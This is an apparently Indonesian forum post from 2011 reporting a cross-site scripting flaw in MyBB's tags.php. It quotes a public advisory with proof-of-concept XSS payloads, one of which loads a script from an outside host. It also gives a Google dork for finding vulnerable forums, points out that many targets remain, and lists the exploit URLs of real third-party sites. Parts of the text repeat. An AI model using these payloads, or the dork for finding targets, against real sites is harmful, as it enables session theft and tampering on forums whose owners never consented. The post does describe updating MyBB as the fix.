05-15-2011, 09:43 PM
Mendapatkan email dadakan dari seseorang yang tidak dikenal ... sangat menyeramkan sih .. tapi kek nah doi adalah salah satu penggemar backtrack sehingga rela membantu kita ...
report bug here :
Setelah ane liat ternyata exploit dah ada ..
yeahh agak berbahaya memang ... tapi low risk ..
masih banyak target sebenarnya .. just for sample
yeahh just for lamers only... ane post hal yang gk penting ini karena memang ada laporan masuk mengenai keberadaan bug di mybb.. obatnya ya cuma ane update doang ke versi lebih tinggi seeh wkwkkwkw =))
report bug here :
Code:
http://forum.id-backtrack.com/tags.php?tag=%22%3E%3Cscript%3Ealert%28String.fromCharCode%2888,83,83%29%29%3C/script%3E
Setelah ane liat ternyata exploit dah ada ..
Code:
MyBB all version (tags.php?tag=) - Cross-Site Scripting (XSS) & HTML
Injection
http://www.mybb.com
12-12-2010
Poc: http://infectionsupport.com/tags.php?tag=
"><script>alert(String.fromCharCode(88,83,83))</script>
http://infectionsupport.com/tags.php?tag="><script src%3d//ckers.org/s
></script>
Google dork: powered by mybb inurl:tags.php?tag=
by Teamelite (Methodman) http://nemesis.te-home.net
yeahh agak berbahaya memang ... tapi low risk ..
masih banyak target sebenarnya .. just for sample
Code:
http://www.mankatoforum.com/forum/tags.php?tag=%22%3E%3Cscript%3Ealert%28String.fromCharCode%2888,83,83%29%29%3C/script%3E
yeahh just for lamers only... ane post hal yang gk penting ini karena memang ada laporan masuk mengenai keberadaan bug di mybb.. obatnya ya cuma ane update doang ke versi lebih tinggi seeh wkwkkwkw =))
FOLLOW @DutaLinux
for more question and sharing about security and Opensource only
for more question and sharing about security and Opensource only